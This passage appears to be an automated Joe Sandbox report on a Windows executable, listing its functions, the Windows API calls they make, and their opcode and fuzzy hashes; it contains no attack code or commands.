                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: LocalTime__swprintf
                                                                                • String ID: %.3d$WIN_XPe
                                                                                • API String ID: 2070861257-2409531811
                                                                                • Opcode ID: 74df3e601d89268f7c6792d13dbecef9d78c58db5f06ffc2f4089f44ae532e6b
                                                                                • Instruction ID: a17cfa02744bc49da1271fc35cf657a7c267c13dcb1c46e9abc3671285de0df9
                                                                                • Opcode Fuzzy Hash: 74df3e601d89268f7c6792d13dbecef9d78c58db5f06ffc2f4089f44ae532e6b
                                                                                • Instruction Fuzzy Hash: F9E01271904628EBCB129751ED05EFA737CAB04741FA004D3FD06E2110E7399BA5AB1B
                                                                                Function 00412205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,004121FB,?,004123EF), ref: 00412213
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00412225
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetProcessId$kernel32.dll
                                                                                • API String ID: 2574300362-399901964
                                                                                • Opcode ID: 2751c7de454ccc5bb3a1c918f5b56d22de91b32b6d9a53aedd6bfd354c7b48d7
                                                                                • Instruction ID: d8df791b77755a0a22882a507f179023b0b396a038ab089afabf9945cbd8473a
                                                                                • Opcode Fuzzy Hash: 2751c7de454ccc5bb3a1c918f5b56d22de91b32b6d9a53aedd6bfd354c7b48d7
                                                                                • Instruction Fuzzy Hash: 4CD0A734800712AFCB214F30F90874677D4EB04304B10587BE842E2250E7F8D8C08658
                                                                                Function 003B42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003B42EC,?,003B42AA,?), ref: 003B4304
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003B4316
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-1355242751
                                                                                • Opcode ID: ede5466f99fccd9f0a201313d7e2cc57f394ee7860467375fc46fa4128bab33e
                                                                                • Instruction ID: 270eb5ef94f5d96b5f1d54dbfc92cbfa95ba099b985844bbcdfbe55ecacf14e6
                                                                                • Opcode Fuzzy Hash: ede5466f99fccd9f0a201313d7e2cc57f394ee7860467375fc46fa4128bab33e
                                                                                • Instruction Fuzzy Hash: 78D0A774900B12AFCB214F20F80C74176D4AB04305B15443BE545D2565E7B4CC808A58
                                                                                Function 003B434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,003B41BB,003B4341,?,003B422F,?,003B41BB,?,?,?,?,003B39FE,?,00000001), ref: 003B4359
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003B436B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-3689287502
                                                                                • Opcode ID: 2668e3e75eb1ae8faeb5d731955f77e02fbb70e99c48f849ae25a1b92df00734
                                                                                • Instruction ID: a65882bb423013e201e03f5cd2a2fa5bc92f8ebbbe40b5de308990c8d3a0835f
                                                                                • Opcode Fuzzy Hash: 2668e3e75eb1ae8faeb5d731955f77e02fbb70e99c48f849ae25a1b92df00734
                                                                                • Instruction Fuzzy Hash: D8D0A774800722AFCB214F30F808B4176D4AB10719B15443BE485D2550E7B4D8808E58
                                                                                Function 003F0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,003F051D,?,003F05FE), ref: 003F0547
                                                                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 003F0559
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                • API String ID: 2574300362-1071820185
                                                                                • Opcode ID: 5a88af1ee769b803f3453dcd5f3925edda1f6c9d8435bd1f10e4ac6d690194ea
                                                                                • Instruction ID: a54755f1b926756df094979b0dfd68b08a4e8a68301470fb593ccd4b3bc99c9d
                                                                                • Opcode Fuzzy Hash: 5a88af1ee769b803f3453dcd5f3925edda1f6c9d8435bd1f10e4ac6d690194ea
                                                                                • Instruction Fuzzy Hash: 7AD0A730804B22AFCB248F24F80871576E4AB01301B21C43EE44AD2155E6F4C8808A54
                                                                                Function 003F0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,003F052F,?,003F06D7), ref: 003F0572
                                                                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 003F0584
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                • API String ID: 2574300362-1587604923
                                                                                • Opcode ID: c3eee86b20f07c39961cd37e2a83381039c37392e087f73ac2267bf93e727325
                                                                                • Instruction ID: f98795c49df26a7d5fb1bc372006a137a8c9ee5335483a773fffcadf9e6abddb
                                                                                • Opcode Fuzzy Hash: c3eee86b20f07c39961cd37e2a83381039c37392e087f73ac2267bf93e727325
                                                                                • Instruction Fuzzy Hash: 77D0A730804716AFCB245F34F948B1277E4AB05301B21843EE945D2154E7F4C4C48A64
                                                                                Function 0040ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0040ECBE,?,0040EBBB), ref: 0040ECD6
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0040ECE8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                • API String ID: 2574300362-1816364905
                                                                                • Opcode ID: 786989666fc364ccb94fd038ecb22e18b8d43a3a2bd655c6fa1941d7880a90ce
                                                                                • Instruction ID: 3877cc7085db2e9cab3db201c6e8bb9a5ba64a121a674e6eae71cac74c4775c9
                                                                                • Opcode Fuzzy Hash: 786989666fc364ccb94fd038ecb22e18b8d43a3a2bd655c6fa1941d7880a90ce
                                                                                • Instruction Fuzzy Hash: 4BD0A730805723EFDF205F61F84870377E4AB00300B14883BF846E2290EFB8C8809658
                                                                                Function 0040BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0040BAD3,00000001,0040B6EE,?,0044DC00), ref: 0040BAEB
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0040BAFD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                • API String ID: 2574300362-199464113
                                                                                • Opcode ID: 86d7dbaee6fc713320586c1e7985f0939c20789108d7cea4fb3d26d3d72074fe
                                                                                • Instruction ID: cc04ab630f93da2cca7f72d3fc5651f68e006574bc5b599b62fa5807ddfe0b6f
                                                                                • Opcode Fuzzy Hash: 86d7dbaee6fc713320586c1e7985f0939c20789108d7cea4fb3d26d3d72074fe
                                                                                • Instruction Fuzzy Hash: 0FD0A730C10B129FCB309F20F848B1277E4EB00300B10443BE843E2694E7B8D880C69D
                                                                                Function 00413BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00413BD1,?,00413E06), ref: 00413BE9
                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00413BFB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 2574300362-4033151799
                                                                                • Opcode ID: c5e1bc080f9400f44e8a1b569b2de4f86efe2a13e068a614921c68504e1b2eee
                                                                                • Instruction ID: 6e4ed54b8a15dab654b5881f70e615417749761ebe3cab3a823c3f5857d15079
                                                                                • Opcode Fuzzy Hash: c5e1bc080f9400f44e8a1b569b2de4f86efe2a13e068a614921c68504e1b2eee
                                                                                • Instruction Fuzzy Hash: 79D0C7759007529FDF205FA5F808743FAF4AB45715B20543BE456F2254F6BCD4C08E99
                                                                                Function 003E9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ed128e4de157ab28c6501d0d8eec56dfeccb61256df87924bfd02f264789f4b7
                                                                                • Instruction ID: e6a76905e35c25cd1192a1523429dededed07693dd76da6663004a75c7905175
                                                                                • Opcode Fuzzy Hash: ed128e4de157ab28c6501d0d8eec56dfeccb61256df87924bfd02f264789f4b7
                                                                                • Instruction Fuzzy Hash: 4EC17D75A0026AEFCB15DF95C884BAEB7B5FF88700F214699E905AF291D730DE41CB90
                                                                                Function 0040AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0040AAB4
                                                                                • CoUninitialize.OLE32 ref: 0040AABF
                                                                                  • Part of subcall function 003F0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003F027B
                                                                                • VariantInit.OLEAUT32(?), ref: 0040AACA
                                                                                • VariantClear.OLEAUT32(?), ref: 0040AD9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                • String ID:
                                                                                • API String ID: 780911581-0
                                                                                • Opcode ID: 7ba7b97a05cb9207471c7a62924ceba4f28dcfb0a596ad4e71cb2385e28a1dd2
                                                                                • Instruction ID: 59ab11d870dbcf1768dd05be147950ea654dc34bcf466be08162764cd7851812
                                                                                • Opcode Fuzzy Hash: 7ba7b97a05cb9207471c7a62924ceba4f28dcfb0a596ad4e71cb2385e28a1dd2
                                                                                • Instruction Fuzzy Hash: A9A15B352087019FDB11DF14C481B5AB7E5BF89714F14845AFA9AAB3A2CB34FD05CB8A
                                                                                Function 003E91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                • String ID:
                                                                                • API String ID: 2808897238-0
                                                                                • Opcode ID: 68a75e0c85db03a12cfe10de9a2d3c2850a965373ff17ea46560c6fba0cd48c6
                                                                                • Instruction ID: 1f5ed6f80830ba6236952213ddb573096df8a7c96515549e5eab9d2fffe2c8bd
                                                                                • Opcode Fuzzy Hash: 68a75e0c85db03a12cfe10de9a2d3c2850a965373ff17ea46560c6fba0cd48c6
                                                                                • Instruction Fuzzy Hash: B551E438A003569BDB369F67D491B6EB3E9EF48314F30891FE646DB6D1DB7098408705
                                                                                Function 003D365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 3877424927-0
                                                                                • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                • Instruction ID: 404f2ed00f6fc53dec0ed41f007cbbc6978797d41939356c9c04d172571d9cda
                                                                                • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                • Instruction Fuzzy Hash: 2C51F6B2A00705ABCB268F69A88466E77A5AF40320F25872BF835963D0D770DF50DB52
                                                                                Function 0041C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowRect.USER32(00F56E10,?), ref: 0041C544
                                                                                • ScreenToClient.USER32(?,00000002), ref: 0041C574
                                                                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0041C5DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                • String ID:
                                                                                • API String ID: 3880355969-0
                                                                                • Opcode ID: ca0c56a2ad7d609db7950929a1aa74e0ad0850def5984b098fe16869a8692188
                                                                                • Instruction ID: 59389a6fafd8477c674e3c74b47f1dfb63fe9b7cb37837790cf18ccbe5645aa2
                                                                                • Opcode Fuzzy Hash: ca0c56a2ad7d609db7950929a1aa74e0ad0850def5984b098fe16869a8692188
                                                                                • Instruction Fuzzy Hash: 51514E75900104AFCF10DF68DCC1AEE77B6EB55720F10865AF9699B290D734ED81CB94
                                                                                Function 003EC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003EC462
                                                                                • __itow.LIBCMT ref: 003EC49C
                                                                                  • Part of subcall function 003EC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003EC753
                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 003EC505
                                                                                • __itow.LIBCMT ref: 003EC55A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$__itow
                                                                                • String ID:
                                                                                • API String ID: 3379773720-0
                                                                                • Opcode ID: 7bd488cc1c8aa0483ed55827e08a6f91a65b63ef1a12bcd3cf654e977b6829bf
                                                                                • Instruction ID: 58cae86c1a3c08e7c7a41a46ba2072b7984b7694612f31f444444614fe79df47
                                                                                • Opcode Fuzzy Hash: 7bd488cc1c8aa0483ed55827e08a6f91a65b63ef1a12bcd3cf654e977b6829bf
                                                                                • Instruction Fuzzy Hash: A241E971A00658AFDF23DF56C852BEE7BB9AF45704F001019FA05AB2C1DB749A46CF51
                                                                                Function 0041B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0041B5D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: InvalidateRect
                                                                                • String ID:
                                                                                • API String ID: 634782764-0
                                                                                • Opcode ID: 417096996eb5f6cba6822536f33256b63b67a57a471f2256b2cddc5c621e9e33
                                                                                • Instruction ID: c94ee7ef58490aedd7901e99eec48406c3660d50ec288b3bda5dd114de98df0f
                                                                                • Opcode Fuzzy Hash: 417096996eb5f6cba6822536f33256b63b67a57a471f2256b2cddc5c621e9e33
                                                                                • Instruction Fuzzy Hash: 8E31DE74601208BBEB209F18CC85FEA3766EB25354F648117FA11D62E1C738A9C18BDE
                                                                                Function 0041D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ClientToScreen.USER32(?,?), ref: 0041D807
                                                                                • GetWindowRect.USER32(?,?), ref: 0041D87D
                                                                                • PtInRect.USER32(?,?,0041ED5A), ref: 0041D88D
                                                                                • MessageBeep.USER32(00000000), ref: 0041D8FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
